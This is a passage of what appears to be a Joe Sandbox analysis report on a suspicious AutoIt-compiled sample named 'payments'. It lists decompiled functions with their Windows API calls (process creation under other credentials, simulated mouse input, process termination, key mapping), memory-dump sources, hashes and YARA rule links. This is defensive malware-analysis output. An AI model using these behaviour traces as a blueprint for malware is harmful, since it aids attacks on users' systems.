                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4137160315-0
                                                                                                                          • Opcode ID: 02f79847a711204e22e482e8ad9846dbe9015c03de63c551176cb016fa898727
                                                                                                                          • Instruction ID: d4fd2dd7f327b3996d34281b324fc7ab8053f3b413465f8f6db42618b4987a95
                                                                                                                          • Opcode Fuzzy Hash: 02f79847a711204e22e482e8ad9846dbe9015c03de63c551176cb016fa898727
                                                                                                                          • Instruction Fuzzy Hash: B331E172204359ABD720DF15DC49F9AB7EAFF89314F00091AF599D7291DB30EA05CBA1
                                                                                                                          Function 00CCAF64 Relevance: 9.1, APIs: 6, Instructions: 73processCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00CCAFAE
                                                                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 00CCAFB5
                                                                                                                          • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00CCAFC4
                                                                                                                          • CloseHandle.KERNEL32(00000004), ref: 00CCAFCF
                                                                                                                          • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00CCAFFE
                                                                                                                          • DestroyEnvironmentBlock.USERENV(00000000), ref: 00CCB012
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1413079979-0
                                                                                                                          • Opcode ID: 19b9c1350baee2d660b48f5afeefa0ef6d410a12debef6fc491456a98974d56b
                                                                                                                          • Instruction ID: 5c0de8f1c02fcbccc0c58abd04db2f1c35678f94130665bc699599478bc8058d
                                                                                                                          • Opcode Fuzzy Hash: 19b9c1350baee2d660b48f5afeefa0ef6d410a12debef6fc491456a98974d56b
                                                                                                                          • Instruction Fuzzy Hash: 09214CB250030DBBDB028FE4DD09FEE7BA9AB44308F148019FA11A2161C7769E21EB61
                                                                                                                          Function 00CFEBF6 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00CAAF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00CAAFE3
                                                                                                                            • Part of subcall function 00CAAF83: SelectObject.GDI32(?,00000000), ref: 00CAAFF2
                                                                                                                            • Part of subcall function 00CAAF83: BeginPath.GDI32(?), ref: 00CAB009
                                                                                                                            • Part of subcall function 00CAAF83: SelectObject.GDI32(?,00000000), ref: 00CAB033
                                                                                                                          • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00CFEC20
                                                                                                                          • LineTo.GDI32(00000000,00000003,?), ref: 00CFEC34
                                                                                                                          • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00CFEC42
                                                                                                                          • LineTo.GDI32(00000000,00000000,?), ref: 00CFEC52
                                                                                                                          • EndPath.GDI32(00000000), ref: 00CFEC62
                                                                                                                          • StrokePath.GDI32(00000000), ref: 00CFEC72
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 43455801-0
                                                                                                                          • Opcode ID: 2d64e94681a3f6402a0c5d64279b3e653229dd220d224929f2b034bdb57fa7c6
                                                                                                                          • Instruction ID: 8b0a8df069140b1837897a51e7e596c418ab6348b7cdea052cf01a8a249efe15
                                                                                                                          • Opcode Fuzzy Hash: 2d64e94681a3f6402a0c5d64279b3e653229dd220d224929f2b034bdb57fa7c6
                                                                                                                          • Instruction Fuzzy Hash: 0B11097600024DBFEB029F90DC88EEA7F6DEB08354F048122BE1889260D7719E56DBA0
                                                                                                                          Function 00CCE19B Relevance: 9.0, APIs: 6, Instructions: 48COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetDC.USER32(00000000), ref: 00CCE1C0
                                                                                                                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 00CCE1D1
                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00CCE1D8
                                                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 00CCE1E0
                                                                                                                          • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00CCE1F7
                                                                                                                          • MulDiv.KERNEL32(000009EC,?,?), ref: 00CCE209
                                                                                                                            • Part of subcall function 00CC9AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00CC9A05,00000000,00000000,?,00CC9DDB), ref: 00CCA53A
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CapsDevice$ExceptionRaiseRelease
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 603618608-0
                                                                                                                          • Opcode ID: 43995850825c042b54173e7f2dfa89558363e227294fc1e99e9e138ec4a53a31
                                                                                                                          • Instruction ID: b671e23052833db10e970aa9ef0611df2b421fd9794b25e1afe034de5a4d3992
                                                                                                                          • Opcode Fuzzy Hash: 43995850825c042b54173e7f2dfa89558363e227294fc1e99e9e138ec4a53a31
                                                                                                                          • Instruction Fuzzy Hash: 3C0171B5A00718BBEB109BA5CC45F5EBFA9EB49351F048066EA04E7391DA709D018B60
                                                                                                                          Function 00CB7B47 Relevance: 9.0, APIs: 6, Instructions: 45threadCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __init_pointers.LIBCMT ref: 00CB7B47
                                                                                                                            • Part of subcall function 00CB123A: __initp_misc_winsig.LIBCMT ref: 00CB125E
                                                                                                                            • Part of subcall function 00CB123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00CB7F51
                                                                                                                            • Part of subcall function 00CB123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00CB7F65
                                                                                                                            • Part of subcall function 00CB123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00CB7F78
                                                                                                                            • Part of subcall function 00CB123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00CB7F8B
                                                                                                                            • Part of subcall function 00CB123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00CB7F9E
                                                                                                                            • Part of subcall function 00CB123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00CB7FB1
                                                                                                                            • Part of subcall function 00CB123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00CB7FC4
                                                                                                                            • Part of subcall function 00CB123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00CB7FD7
                                                                                                                            • Part of subcall function 00CB123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00CB7FEA
                                                                                                                            • Part of subcall function 00CB123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00CB7FFD
                                                                                                                            • Part of subcall function 00CB123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00CB8010
                                                                                                                            • Part of subcall function 00CB123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00CB8023
                                                                                                                            • Part of subcall function 00CB123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00CB8036
                                                                                                                            • Part of subcall function 00CB123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00CB8049
                                                                                                                            • Part of subcall function 00CB123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00CB805C
                                                                                                                            • Part of subcall function 00CB123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00CB806F
                                                                                                                          • __mtinitlocks.LIBCMT ref: 00CB7B4C
                                                                                                                            • Part of subcall function 00CB7E23: InitializeCriticalSectionAndSpinCount.KERNEL32(00D4AC68,00000FA0,?,?,00CB7B51,00CB5E77,00D46C70,00000014), ref: 00CB7E41
                                                                                                                          • __mtterm.LIBCMT ref: 00CB7B55
                                                                                                                            • Part of subcall function 00CB7BBD: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00CB7B5A,00CB5E77,00D46C70,00000014), ref: 00CB7D3F
                                                                                                                            • Part of subcall function 00CB7BBD: _free.LIBCMT ref: 00CB7D46
                                                                                                                            • Part of subcall function 00CB7BBD: DeleteCriticalSection.KERNEL32(00D4AC68,?,?,00CB7B5A,00CB5E77,00D46C70,00000014), ref: 00CB7D68
                                                                                                                          • __calloc_crt.LIBCMT ref: 00CB7B7A
                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00CB7BA3
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2942034483-0
                                                                                                                          • Opcode ID: f8712158ad0929c1749047442a620e5eb6b499e6b07a8a3d7b0334bf23334009
                                                                                                                          • Instruction ID: 5ad71bd07a19fc4d5ac1c6b79b5d1199fb7d50ec50fbd762789c43783d8f92bd
                                                                                                                          • Opcode Fuzzy Hash: f8712158ad0929c1749047442a620e5eb6b499e6b07a8a3d7b0334bf23334009
                                                                                                                          • Instruction Fuzzy Hash: 97F0903254D3521FEA287B787C06ACB2684DF82730F2007AAFC60D52D2FF21894179B1
                                                                                                                          Function 00C927EC Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00C9281D
                                                                                                                          • MapVirtualKeyW.USER32(00000010,00000000), ref: 00C92825
                                                                                                                          • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00C92830
                                                                                                                          • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00C9283B
                                                                                                                          • MapVirtualKeyW.USER32(00000011,00000000), ref: 00C92843
                                                                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C9284B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Virtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4278518827-0
                                                                                                                          • Opcode ID: c0625ba218d1aee1b08272e4f6d2f2b3d7f03d4a52497dc73cd65ed75f604c1f
                                                                                                                          • Instruction ID: bf936b5388ff3aa55cebe3540984dac9781080a1dadc7887c5cdb27ef3c675d1
                                                                                                                          • Opcode Fuzzy Hash: c0625ba218d1aee1b08272e4f6d2f2b3d7f03d4a52497dc73cd65ed75f604c1f
                                                                                                                          • Instruction Fuzzy Hash: 2A0144B0902B5ABDE3008F6A8C85A52FFA8FF19354F00411BA15C87A42C7B5A864CBE5
                                                                                                                          Function 00CD9AD5 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1423608774-0
                                                                                                                          • Opcode ID: b6580aff6a35ad88ebca3573e7c980cd30d6fbfe04c20236ae5c6407aeb6ee8e
                                                                                                                          • Instruction ID: 89d8f5135d25359ce01c5876d7a8dea99764500809d7c84156b2393669ff5489
                                                                                                                          • Opcode Fuzzy Hash: b6580aff6a35ad88ebca3573e7c980cd30d6fbfe04c20236ae5c6407aeb6ee8e
                                                                                                                          • Instruction Fuzzy Hash: E601A937201321BBD7152B54EC48EEB776AFF88701704452AF617D22A0DF749D01EB60
                                                                                                                          Function 00CD7BF7 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00CD7C07
                                                                                                                          • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00CD7C1D
                                                                                                                          • GetWindowThreadProcessId.USER32(?,?), ref: 00CD7C2C
                                                                                                                          • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00CD7C3B
                                                                                                                          • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00CD7C45
                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00CD7C4C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 839392675-0
                                                                                                                          • Opcode ID: 955b75b8283027f1bd441755661c4adbc5f584481e8944c3ce3414b68b506cfe
                                                                                                                          • Instruction ID: 892baab00e5a669ed571d5cdee70a5413a30e4cc2e6f78c5b2f134fe098ba478
                                                                                                                          • Opcode Fuzzy Hash: 955b75b8283027f1bd441755661c4adbc5f584481e8944c3ce3414b68b506cfe
                                                                                                                          • Instruction Fuzzy Hash: 07F03A72241258BBE7215B929C0EEEF7F7DEFC6B11F004019FA01D1251EBA45A82C6B5
                                                                                                                          Function 00CD9A20 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • InterlockedExchange.KERNEL32(?,?), ref: 00CD9A33
                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,00D05DEE,?,?,?,?,?,00C9ED63), ref: 00CD9A44
                                                                                                                          • TerminateThread.KERNEL32(?,000001F6,?,?,?,00D05DEE,?,?,?,?,?,00C9ED63), ref: 00CD9A51
                                                                                                                          • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00D05DEE,?,?,?,?,?,00C9ED63), ref: 00CD9A5E
                                                                                                                            • Part of subcall function 00CD93D1: CloseHandle.KERNEL32(?,?,00CD9A6B,?,?,?,00D05DEE,?,?,?,?,?,00C9ED63), ref: 00CD93DB
                                                                                                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 00CD9A71
                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,?,00D05DEE,?,?,?,?,?,00C9ED63), ref: 00CD9A78
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3495660284-0
                                                                                                                          • Opcode ID: 9289e6403c0e937ca6301493b97ed39fde994712ff5701dde0968546a8e273a9
                                                                                                                          • Instruction ID: 79ae816c9cc3920b0ba16a7d4abd0f97ff3446bd97be13eb51f44fc679153385
                                                                                                                          • Opcode Fuzzy Hash: 9289e6403c0e937ca6301493b97ed39fde994712ff5701dde0968546a8e273a9
                                                                                                                          • Instruction Fuzzy Hash: 71F0BE36141311BBD3112BA4EC88DEA773AFF84301B044022F613D22A0CF749902EB60
                                                                                                                          Function 00C91CDE Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 250COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00CAF4EA: std::exception::exception.LIBCMT ref: 00CAF51E
                                                                                                                            • Part of subcall function 00CAF4EA: __CxxThrowException@8.LIBCMT ref: 00CAF533
                                                                                                                          • __swprintf.LIBCMT ref: 00C91EA6
                                                                                                                          Strings
                                                                                                                          • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00C91D49
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Exception@8Throw__swprintfstd::exception::exception
                                                                                                                          • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                                          • API String ID: 2125237772-557222456
                                                                                                                          • Opcode ID: 2249c2cd84c9b1795f9d3d7c74c5c3d47b5afd8feca88074e0aafdda0fe3c0ad
                                                                                                                          • Instruction ID: 643349254a96e3f48d95f648d4dd74f7d9116ad30d40b4f39390181d71ae8fc9
                                                                                                                          • Opcode Fuzzy Hash: 2249c2cd84c9b1795f9d3d7c74c5c3d47b5afd8feca88074e0aafdda0fe3c0ad
                                                                                                                          • Instruction Fuzzy Hash: A4917C71114202AFCB24EF64C89AD6EB7A4FF85700F04496DF895972A1DB30EE05DBA2
                                                                                                                          Function 00CEAFE0 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 229COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • VariantInit.OLEAUT32(?), ref: 00CEB006
                                                                                                                          • CharUpperBuffW.USER32(?,?), ref: 00CEB115
                                                                                                                          • VariantClear.OLEAUT32(?), ref: 00CEB298
                                                                                                                            • Part of subcall function 00CD9DC5: VariantInit.OLEAUT32(00000000), ref: 00CD9E05
                                                                                                                            • Part of subcall function 00CD9DC5: VariantCopy.OLEAUT32(?,?), ref: 00CD9E0E
                                                                                                                            • Part of subcall function 00CD9DC5: VariantClear.OLEAUT32(?), ref: 00CD9E1A
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                                                          • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                          • API String ID: 4237274167-1221869570
                                                                                                                          • Opcode ID: fe2e14ad425b0c7e3deb398c6f718ad1c3a17bf96b383657de5652fabcbb16b7
                                                                                                                          • Instruction ID: 16f23315fdf054b9f84d4c87a64cedbc2981e112fccb596efb419a66f8ac5249
                                                                                                                          • Opcode Fuzzy Hash: fe2e14ad425b0c7e3deb398c6f718ad1c3a17bf96b383657de5652fabcbb16b7
                                                                                                                          • Instruction Fuzzy Hash: 4A9178716083419FCB10DF29C48596BBBE4EF89714F04886EF99A9B362DB31ED05CB52
                                                                                                                          Function 00CFC4D7 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 137COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetWindowRect.USER32(00E965A8,?), ref: 00CFC544
                                                                                                                          • ScreenToClient.USER32(?,00000002), ref: 00CFC574
                                                                                                                          • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 00CFC5DA
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$ClientMoveRectScreen
                                                                                                                          • String ID: @U=u
                                                                                                                          • API String ID: 3880355969-2594219639
                                                                                                                          • Opcode ID: 71533dfd62a601d899be8404980b56e0317a2ea90bc21dd8b75effb6496390cb
                                                                                                                          • Instruction ID: ac040b0bb9dfd43f50f995c48c497a54b4208862a724c61f749be6800064d578
